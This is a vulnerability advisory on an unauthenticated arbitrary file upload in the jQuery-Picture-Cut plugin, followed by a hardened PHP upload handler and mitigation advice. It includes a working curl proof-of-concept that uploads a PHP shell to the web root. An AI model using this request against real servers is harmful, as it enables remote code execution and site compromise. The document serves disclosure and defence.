Larry W. Cashdollar
2018-11-20 22:05:41 UTC
Author: Larry W. Cashdollar, @_larry0
CWE: CWE-434 arbitrary file upload
Download Site: https://github.com/TuyoshiVinicius/jQuery-Picture-Cut
Vendor Notified: 2018-11-03
Vendor Contact: ***@hotmail.com
Description: Picture Cut is a jQuery plugin that handles images in a very friendly and simple way, with a beautiful interface based on Bootstrap or jQuery UI. It has great features like AJAX upload, drag image from explorer, image crop and others.
The code in jQuery-Picture-Cut/src/php/upload.php that calls ../core/PictureCut.php to handle the file upload does not check the file type and allows the user to choose the file location path. An unauthenticated user can upload an executable PHP file to the server, allowing code execution.
1. curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "firstname.lastname@example.org" http://example.com/jQuery-Picture-Cut/src/php/upload.php
3. With folderOnServer=/ the shell will be in the main web directory path.
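The two defects described above (no file-type check, client-chosen destination folder) are what a hardened upload handler has to close. The following is an added example written for this advisory, not code from jQuery-Picture-Cut or its author: it sniffs the uploaded content with libmagic and checks that it decodes as an image, confines the client-supplied folderOnServer to a single sub-directory of a fixed upload base, and always generates the stored file name server-side. The parameter names folderOnServer and request are taken from the request in the advisory; the multipart field name "file", the UPLOAD_BASE location and the JSON response shape are assumptions.

```php
<?php
// Added example (not jQuery-Picture-Cut's own code): a hardened replacement for
// the upload logic the advisory describes. Parameter names folderOnServer and
// request follow the advisory's curl request; the field name "file", the
// upload base directory and the response format are assumptions.

declare(strict_types=1);

// Base directory under which uploads may land. The client may only pick a
// sub-folder of this, never an arbitrary path such as "/".
const UPLOAD_BASE = __DIR__ . '/uploads';

// Allow-list of image types: extension => MIME type reported by libmagic.
const ALLOWED_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Resolve the client-supplied folder to a directory inside UPLOAD_BASE.
 * Returns null when the value is not a plain folder name or would escape the base.
 */
function resolveTargetDir(string $folderOnServer): ?string
{
    // Only a simple, relative, single-level folder name is accepted
    // (no "/", "..", or other separators, so "folderOnServer=/" is rejected).
    if (!preg_match('/^[A-Za-z0-9_-]{0,64}$/', $folderOnServer)) {
        return null;
    }
    $target = UPLOAD_BASE . ($folderOnServer === '' ? '' : '/' . $folderOnServer);
    if (!is_dir($target) && !mkdir($target, 0750, true)) {
        return null;
    }
    $real = realpath($target);
    $base = realpath(UPLOAD_BASE);
    // Containment check after symlink resolution: must sit under the base.
    if ($real === false || $base === false || strpos($real . '/', $base . '/') !== 0) {
        return null;
    }
    return $real;
}

/**
 * Validate one $_FILES entry. Returns the extension to store it under,
 * or null when the upload is not an allowed image.
 */
function validateImage(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Never trust the client-supplied name or MIME type: sniff the content.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    $ext   = array_search($mime, ALLOWED_TYPES, true);
    if ($ext === false) {
        return null;
    }
    // Additionally require the data to decode as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        return null;
    }
    return $ext;
}

/** Handle one upload request and return a result array for JSON output. */
function handleUpload(array $post, array $files): array
{
    $dir = resolveTargetDir((string) ($post['folderOnServer'] ?? ''));
    if ($dir === null) {
        return ['ok' => false, 'error' => 'invalid folder'];
    }
    $ext = validateImage($files['file'] ?? []);
    if ($ext === null) {
        return ['ok' => false, 'error' => 'file is not an allowed image'];
    }
    // The stored name is always generated here; the client's name is ignored,
    // so a request cannot choose a .php (or any other) extension.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = $dir . '/' . $name;
    if (!move_uploaded_file($files['file']['tmp_name'], $dest)) {
        return ['ok' => false, 'error' => 'could not store file'];
    }
    chmod($dest, 0640); // stored files are never executable
    return ['ok' => true, 'path' => $dest];
}

if (($_POST['request'] ?? '') === 'upload') {
    header('Content-Type: application/json');
    echo json_encode(handleUpload($_POST, $_FILES));
}
```

Content sniffing and getimagesize() reduce the risk but are not a complete defence on their own, since image containers can carry appended data; the backstop is to keep UPLOAD_BASE outside the document root, or to configure the web server so that nothing under it is executed as PHP, so that even a file that passes validation can never run.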